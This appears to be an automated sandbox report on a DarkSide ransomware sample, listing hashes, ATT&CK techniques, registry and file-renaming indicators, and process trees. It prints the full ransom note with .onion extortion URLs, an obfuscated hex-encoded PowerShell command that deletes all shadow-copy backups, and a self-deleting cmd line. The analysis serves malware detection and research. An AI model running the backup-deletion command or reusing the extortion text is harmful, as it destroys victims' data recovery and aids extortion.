darkside | 4dcb5d42f6a37cb000de14de346978fa3a9f6a8cd4e41aaec3a15534cc726a1d

Analysis

max time kernel
98s
max time network
84s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
02-06-2023 21:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Darkside.exe
Size

59KB
MD5

cfcfb68901ffe513e9f0d76b17d02f96
SHA1

766b30e5a37d1bc8d8fe5c7cacc314504a44ac1f
SHA256

17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61
SHA512

0d26fa9478f4626107e38c570d1bae1049b744181cf0395d95fb07675575ca393d88d4783bf31bdf11bef1da5648a5a53a6d95b21492f96b4de35c0ec323ae0c
SSDEEP

768:9jjV7Iax7F3DS4/S96/P3rsAc4ci5pwwX5+R4VYY23W5:vx7Fu4/i6/P3rlckx5+R4VDZ5

Score

10^/10

darkside persistence ransomware spyware stealer

Malware Config

Extracted

Path

C:\Users\README.db7e0c7a.TXT

Family

darkside

Ransom Note

----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. Data leak ---------------------------------------------- First of all we have uploaded more then 90 GB data. These files include: Finance data Insurance data Buchgalting Data Banking data and details, bank contracts, creditors info Much personal data Marketing data Production, Technik data Email conversations dump and more others. All documents are fresh (last 365 days) and stored on our offline servers. All data will be published piece by piece. First data pack will be published in 7 days if we do not come for agreement. Your personal leak page: http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF On the page you will find examples of files that have been stolen. The data is preloaded and will be automatically published if you do not pay. After publication, your data will be available for at least 6 months on our tor cdn servers. We are ready: - To provide you the evidence of stolen data - To delete all the stolen data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH When you open our website, put the following data in the input form: Key: rIzr2nCuqbQL7MGMwoppaucqSp5AZufUiYhssYa1SGfO0XFf09fBDlLDWgKQSnnvIAfqYTsOgUhOTxzbxGsC9nH0yk2HOFhn7t8ntX8L0evyce8vKdgUKF7Xvjn6ljaQQ4HPEfPZFP2jvN0DgBVWl2WgNT1U3owZ1bNBjps34t33ObZc01Ce1yKx5CSlwUYbw1ktjqt5d7R9DwRL3NIGrTHvMX3qXI5aBAUnirnc4zHtfGPXq4CuFoh04Tv7VE81aohfvuz8D7wo7i28sbILoJyF6mzeQwSkAXolOhXKQAEPsGcdbfLxfY5uILkHB3d1gAyxT1owQXsY4heNQbY3yYL1Em7dDaLdbNhOf0adYWFiFfAl9EwLDRT96L9Xzsk17ho1B82wOWZ79ZqtT8yqnZ4APJb1LO91ASSsgUdNvR0lAaZTfXHHxUI1vDm5ygyV7cbxMlrQ5K1U6ughdd5WosogMJWVNjreirhzuDzY6SnixtukGYG0D9azzgOHcgidJcLV4n0orhzIaA1SMNYOpdOIadgBehCaHwEyr3hn8CEa6fgpUgK6E95 !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!

URLs

http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF

http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH

Signatures

DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
ransomware darkside
Renames multiple (168) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Modifies extensions of user files 11 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

Darkside.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\DebugHide.tif => C:\Users\Admin\Pictures\DebugHide.tif.db7e0c7a	Darkside.exe
File opened for modification	C:\Users\Admin\Pictures\InstallDeny.crw.db7e0c7a	Darkside.exe
File renamed	C:\Users\Admin\Pictures\JoinCompare.tif => C:\Users\Admin\Pictures\JoinCompare.tif.db7e0c7a	Darkside.exe
File opened for modification	C:\Users\Admin\Pictures\UndoSwitch.tiff	Darkside.exe
File renamed	C:\Users\Admin\Pictures\UndoSwitch.tiff => C:\Users\Admin\Pictures\UndoSwitch.tiff.db7e0c7a	Darkside.exe
File opened for modification	C:\Users\Admin\Pictures\UndoSwitch.tiff.db7e0c7a	Darkside.exe
File renamed	C:\Users\Admin\Pictures\UseRestart.tif => C:\Users\Admin\Pictures\UseRestart.tif.db7e0c7a	Darkside.exe
File opened for modification	C:\Users\Admin\Pictures\UseRestart.tif.db7e0c7a	Darkside.exe
File opened for modification	C:\Users\Admin\Pictures\DebugHide.tif.db7e0c7a	Darkside.exe
File renamed	C:\Users\Admin\Pictures\InstallDeny.crw => C:\Users\Admin\Pictures\InstallDeny.crw.db7e0c7a	Darkside.exe
File opened for modification	C:\Users\Admin\Pictures\JoinCompare.tif.db7e0c7a	Darkside.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Adds Run key to start application 2 TTPs 1 IoCs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Processes:

chrome.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000\Software\Microsoft\Windows\CurrentVersion\Run chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000\Software\Microsoft\Windows\CurrentVersion\Run	chrome.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

Darkside.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\db7e0c7a.BMP"	Darkside.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\db7e0c7a.BMP"	Darkside.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

Darkside.exe

pid process

2452 Darkside.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
2452	Darkside.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies Control Panel 1 IoCs

evasion

Processes:

Darkside.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000\Control Panel\Desktop\WallpaperStyle = "10"	Darkside.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133302150090164902"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 5 IoCs

Processes:

Darkside.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\db7e0c7a	Darkside.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\db7e0c7a\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\db7e0c7a.ico"	Darkside.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.db7e0c7a	Darkside.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.db7e0c7a\ = "db7e0c7a"	Darkside.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\db7e0c7a\DefaultIcon	Darkside.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exeDarkside.exechrome.exe

pid process

4508 powershell.exe
4508 powershell.exe
4508 powershell.exe
2452 Darkside.exe
2452 Darkside.exe
1664 chrome.exe
1664 chrome.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

Processes:

chrome.exe

pid process

1664 chrome.exe
1664 chrome.exe
1664 chrome.exe
1664 chrome.exe
1664 chrome.exe
1664 chrome.exe

pid	process
4508	powershell.exe
4508	powershell.exe
4508	powershell.exe
2452	Darkside.exe
2452	Darkside.exe
1664	chrome.exe
1664	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Darkside.exepowershell.exevssvc.exechrome.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	2452	Darkside.exe
Token: SeSecurityPrivilege	2452	Darkside.exe
Token: SeTakeOwnershipPrivilege	2452	Darkside.exe
Token: SeLoadDriverPrivilege	2452	Darkside.exe
Token: SeSystemProfilePrivilege	2452	Darkside.exe
Token: SeSystemtimePrivilege	2452	Darkside.exe
Token: SeProfSingleProcessPrivilege	2452	Darkside.exe
Token: SeIncBasePriorityPrivilege	2452	Darkside.exe
Token: SeCreatePagefilePrivilege	2452	Darkside.exe
Token: SeBackupPrivilege	2452	Darkside.exe
Token: SeRestorePrivilege	2452	Darkside.exe
Token: SeShutdownPrivilege	2452	Darkside.exe
Token: SeDebugPrivilege	2452	Darkside.exe
Token: SeSystemEnvironmentPrivilege	2452	Darkside.exe
Token: SeRemoteShutdownPrivilege	2452	Darkside.exe
Token: SeUndockPrivilege	2452	Darkside.exe
Token: SeManageVolumePrivilege	2452	Darkside.exe
Token: 33	2452	Darkside.exe
Token: 34	2452	Darkside.exe
Token: 35	2452	Darkside.exe
Token: 36	2452	Darkside.exe
Token: SeDebugPrivilege	4508	powershell.exe
Token: SeBackupPrivilege	4836	vssvc.exe
Token: SeRestorePrivilege	4836	vssvc.exe
Token: SeAuditPrivilege	4836	vssvc.exe
Token: SeShutdownPrivilege	1664	chrome.exe
Token: SeCreatePagefilePrivilege	1664	chrome.exe
Token: SeShutdownPrivilege	1664	chrome.exe
Token: SeCreatePagefilePrivilege	1664	chrome.exe
Token: SeShutdownPrivilege	1664	chrome.exe
Token: SeCreatePagefilePrivilege	1664	chrome.exe
Token: SeShutdownPrivilege	1664	chrome.exe
Token: SeCreatePagefilePrivilege	1664	chrome.exe
Token: SeShutdownPrivilege	1664	chrome.exe
Token: SeCreatePagefilePrivilege	1664	chrome.exe
Token: SeShutdownPrivilege	1664	chrome.exe
Token: SeCreatePagefilePrivilege	1664	chrome.exe
Token: SeShutdownPrivilege	1664	chrome.exe
Token: SeCreatePagefilePrivilege	1664	chrome.exe
Token: SeShutdownPrivilege	1664	chrome.exe
Token: SeCreatePagefilePrivilege	1664	chrome.exe
Token: SeShutdownPrivilege	1664	chrome.exe
Token: SeCreatePagefilePrivilege	1664	chrome.exe
Token: SeShutdownPrivilege	1664	chrome.exe
Token: SeCreatePagefilePrivilege	1664	chrome.exe
Token: SeShutdownPrivilege	1664	chrome.exe
Token: SeCreatePagefilePrivilege	1664	chrome.exe
Token: SeShutdownPrivilege	1664	chrome.exe
Token: SeCreatePagefilePrivilege	1664	chrome.exe
Token: SeShutdownPrivilege	1664	chrome.exe
Token: SeCreatePagefilePrivilege	1664	chrome.exe
Token: SeShutdownPrivilege	1664	chrome.exe
Token: SeCreatePagefilePrivilege	1664	chrome.exe
Token: SeShutdownPrivilege	1664	chrome.exe
Token: SeCreatePagefilePrivilege	1664	chrome.exe
Token: SeShutdownPrivilege	1664	chrome.exe
Token: SeCreatePagefilePrivilege	1664	chrome.exe
Token: SeShutdownPrivilege	1664	chrome.exe
Token: SeCreatePagefilePrivilege	1664	chrome.exe
Token: SeShutdownPrivilege	1664	chrome.exe
Token: SeCreatePagefilePrivilege	1664	chrome.exe
Token: SeShutdownPrivilege	1664	chrome.exe
Token: SeCreatePagefilePrivilege	1664	chrome.exe
Token: SeShutdownPrivilege	1664	chrome.exe

Suspicious use of FindShellTrayWindow 27 IoCs

Processes:

chrome.exe

pid	process
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe
1664	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Darkside.exechrome.exe

description	pid	process	target process
PID 2452 wrote to memory of 4508	2452	Darkside.exe	powershell.exe
PID 2452 wrote to memory of 4508	2452	Darkside.exe	powershell.exe
PID 2452 wrote to memory of 244	2452	Darkside.exe	cmd.exe
PID 2452 wrote to memory of 244	2452	Darkside.exe	cmd.exe
PID 2452 wrote to memory of 244	2452	Darkside.exe	cmd.exe
PID 1664 wrote to memory of 1332	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1332	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 1880	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 2888	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 2888	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 2716	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 2716	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 2716	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 2716	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 2716	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 2716	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 2716	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 2716	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 2716	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 2716	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 2716	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 2716	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 2716	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 2716	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 2716	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 2716	1664	chrome.exe	chrome.exe
PID 1664 wrote to memory of 2716	1664	chrome.exe	chrome.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\Darkside.exe
"C:\Users\Admin\AppData\Local\Temp\Darkside.exe"
1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2452

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4508

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\Darkside.exe >> NUL
2⤵
PID:244

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4836

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1664

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffc8f9f9758,0x7ffc8f9f9768,0x7ffc8f9f9778
2⤵
PID:1332

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1936 --field-trial-handle=1796,i,6875293325085466340,9220117868484236398,131072 /prefetch:8
2⤵
PID:2888

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1600 --field-trial-handle=1796,i,6875293325085466340,9220117868484236398,131072 /prefetch:2
2⤵
PID:1880

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2028 --field-trial-handle=1796,i,6875293325085466340,9220117868484236398,131072 /prefetch:8
2⤵
PID:2716

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2992 --field-trial-handle=1796,i,6875293325085466340,9220117868484236398,131072 /prefetch:1
2⤵
PID:3980

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2960 --field-trial-handle=1796,i,6875293325085466340,9220117868484236398,131072 /prefetch:1
2⤵
PID:2500

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4332 --field-trial-handle=1796,i,6875293325085466340,9220117868484236398,131072 /prefetch:1
2⤵
PID:320

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3556 --field-trial-handle=1796,i,6875293325085466340,9220117868484236398,131072 /prefetch:8
2⤵
PID:4280

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4672 --field-trial-handle=1796,i,6875293325085466340,9220117868484236398,131072 /prefetch:8
2⤵
PID:4232

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4840 --field-trial-handle=1796,i,6875293325085466340,9220117868484236398,131072 /prefetch:8
2⤵
PID:544

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4804 --field-trial-handle=1796,i,6875293325085466340,9220117868484236398,131072 /prefetch:8
2⤵
PID:684

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5004 --field-trial-handle=1796,i,6875293325085466340,9220117868484236398,131072 /prefetch:1
2⤵
PID:4480

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5304 --field-trial-handle=1796,i,6875293325085466340,9220117868484236398,131072 /prefetch:1
2⤵
PID:4016

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4948 --field-trial-handle=1796,i,6875293325085466340,9220117868484236398,131072 /prefetch:1
2⤵
PID:3860

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4452

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\070E0202839D9D67350CD2613E78E416
Filesize
1KB

MD5
55540a230bdab55187a841cfe1aa1545

SHA1
363e4734f757bdeb89868efe94907774a327695e

SHA256
d73494e3446b02167573b3cde3ae1c8584ac26e15e45ac3ec0326708425d90fb

SHA512
c899cb1d31d3214fd9dc8626a55e40580d3b2224bf34310c2abd85d0f63e2dedaeae57832f048c2f500cb2cbf83683fcb14139af3f0b5251606076cdb4689c54

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Filesize
62KB

MD5
b5fcc55cffd66f38d548e8b63206c5e6

SHA1
79db08ababfa33a4f644fa8fe337195b5aba44c7

SHA256
7730df1165195dd5bb6b40d6e519b4ce07aceb03601a77bca6535d31698d4ca1

SHA512
aaa17175e90dbca04f0fa753084731313e70119fef7d408b41ff4170116ab24eaee0bd05dca2cc43464b1ee920819e5ce6f6e750d97e3c4fc605f01e7ff9c649

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\070E0202839D9D67350CD2613E78E416
Filesize
230B

MD5
add9af064ff19c90cf71b1e127b76ee5

SHA1
a98504fb6496b7d4072adadcabd72d64cc727ffe

SHA256
2366d937735bd5b63cc6a6341b74b865e302f947e750fac52b7a955ff461f9d1

SHA512
a2e6b27dd8b4240d69358713b25a457110a5bbcdf364345a0c3c4d03687a214fe9f493ee22303cbe495181d7ac76475bca75aa55b00491f604aad6c4cc2fa2b9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\550c83c3-00b2-4bd7-9854-5ea71ef34cfd.tmp
Filesize
6KB

MD5
dab67d63adc61d0c53d69f0556b6b282

SHA1
2111b74ee9c4dffeb764c8028eeec238473128bb

SHA256
12fb0be05c6c8198a972ffd0866060f80207f83bf3e3962c7c18809899d1e381

SHA512
e25ef048b6224dc1b35ce40f8d69c9923839093d3b6591bc8f80da29790c2b1cef238d5f6c7c2fe7575f7e51c4e02c3cdf1c4ef91ee9207cc3c16018c1fe5b49

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00002f
Filesize
162KB

MD5
44ec03cb3248c903b67751ea27df310a

SHA1
c57e9cf90caf30457e9d57db750b8a0eb8856770

SHA256
d4de4a836d11828dd561db1eb8d7fd48a7e0ce9afd8645e2eabb19a1267b6894

SHA512
657e8958d97eab524224bbd8903e0bd7d0c2640805f77da7546060164fe03f7b6ece99a005ef44e41b7233a2e24ffc63430b2fe3c87f61a1b26e0d7c7e52c365

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
1KB

MD5
fe626b8eee6354d91dc4ddd7830cdb25

SHA1
1ef390da341c3e0e533ef6b12b11d9a27e2448db

SHA256
2a1fb8e5ff7af50e5e01dc28e8c2b69328cde368ab8f1cfc0f63c212303bce97

SHA512
